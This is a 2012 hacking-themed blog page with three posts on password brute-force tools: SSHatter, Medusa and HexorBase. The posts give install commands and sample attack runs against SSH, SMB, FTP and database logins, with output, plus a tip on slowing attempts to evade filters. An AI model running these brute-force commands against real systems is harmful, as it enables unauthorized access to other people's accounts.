BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 
Showing posts with label Bruteforce. Show all posts
Showing posts with label Bruteforce. Show all posts

Monday, July 16, 2012

SSHatter – SSH Brute Forcer

0 comments

Essentially the tool is comprised of a small Perl file. The utility requires a few non-standard Perl libraries but these are easily installed. You must have Perl installed to use SSHatter.
Installing SSHatter
First download and unpack the tool
Select AllCode:
wget http://freshmeat.net/redir/sshatter/70781/url_tgz/get.php
tar -xvzf SSHatter-0.6.tar.gz
cd SSHatter-0.6/src
Next you may have to install the following perl libraries.
Install Parallel::ForkManager
To install Parallel:::Forkmanager it is easiest to simply download the source from
http://search.cpan.org/~dlux/Parallel-ForkManager-0.7.5/ForkManager.pm
and compile the module yourself
Select AllCode:
wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz
tar -xvzf Parallel-ForkManager-0.7.5.tar.gz
cd Parallel-ForkManager-0.7.5
perl Makefile.pl
make
sudo make install
Install Net::SSH-Perl
This package is usually distributed as a package and can easily be installed on most systems.
On Fedora use:
Select AllCode:
sudo yum install perl-Net-SSH-Perl
Once you have installed these modules you'll need to create a file full of potential targets and a file of usernames to try. A simple password file is distributed with SSHatter but you may want download and utilize a more extensive one. SSHatter also uses a file of usernames. Again, you can download an extensive file or perhaps tailor this file to the target system. For our purposes we'll simply target localhost and try and brute force the user root.
Select AllCode:
$ perl SSHatter.pl
usage: SSHatter.pl
sleeptime: 0 - disable retries at SSHatter.pl line 62.
$ echo root > users
$ echo 127.0.0.1 > targets
$ perl SSHatter.pl 1 targets users passwords 1 1
Evaluation
The source code to SSHatter is a mere 168 lines, making it rather compact. SSHatter also supports connection attempts to alternate port numbers if the targets are listed with an IP address, then a colon and the port (i.e. 127.0.0.1:20). SSHatter does include the handy functionality of being able to sleep between tries, so you can slow your brute force attempts, which may evade some filters.
All in all SSHatter is a simple, straightforward tool. It isn't particulary fast, stealthy or easy to use. It doesn't include any advanced functionality such as documentation, randomly generated passwords or a GUI. SSHatter also doesn't have any easy way to configure scans of ranges of IP's and seems to rely on a pre-built target list. SSHatter is also distributed as copyrighted material, rather than as GPL material, which will probably limit any sort of participation or active development community.

©2012, copyright BLACK BURN

Medusa – Multi-protocol brute force utility

0 comments

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:
  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.
  • Multiple protocols supported. Many services are currently supported (e.g. SMB,  HTTP, POP3,  MS-SQL, SSHv2, among others).
Available Brute force modules:
Compilation Process:
Select AllCode:
% wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
% tar -zxvf medusa-2.0.tar.gz ; cd medusa-2.0
% ./configure ; make ; make install
Also for SSH support download and install libssh2 library:
Select AllCode:
% wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet
% tar -zxvf libssh2-1.1.tar.gz ; cd libssh2-1.1
% ./ configure ; make ; make install
SSH Brute Force:
Select AllCode:
% medusa -M ssh -H host.txt -U users.txt -p password
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
 
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: foo (1 of 4, 0 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: administrator (2 of 4, 1 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: jmk (3 of 4, 2 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: bar (4 of 4, 3 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.11 (2 of 11, 1 complete) User: foo (1 of 4, 0 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.11 (2 of 11, 1 complete) User: administrator (2 of 4, 1 complete) Password: password (1 of 1 complete)
ALERT: Medusa received SIGINT - Sending notification to login threads that we are are aborting.
ACCOUNT CHECK: [ssh] Host: 192.168.0.11 (2 of 11, 1 complete) User: jmk (3 of 4, 2 complete) Password: password (1 of 1 complete)
ALERT: To resume scan, add the following to your original command: "-Z h2u3u4h3."
SMB Brute Force:
Select AllCode:
% medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt
 
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
 
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password:  (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)
FTP Brute Force:
Select AllCode:
% medusa -u test -P passwords.txt -h 192.168.0.20 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
 
ACCOUNT CHECK: [ftp] Host: 192.168.0.20 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 12345 (1 of 100 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.0.20 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: password (2 of 100 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.0.20 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (3 of 100 complete)

©2012, copyright BLACK BURN

Brute Force Database Servers with HexorBase

0 comments

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.
It works on Linux and Windows running the following:
Requirements:
python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
Select AllCode:
root@host:~# dpkg -i hexorbase_1.0_all.deb
To get the source code for this project from SVN, here’s the checkout link:
Select AllCode:
root@host:~# svn checkout http://hexorbase.googlecode.com/svn/
Heres a video on how the program works
Download:

©2012, copyright BLACK BURN
 

7 Years Earning Experience

The Earning Source You Can Trust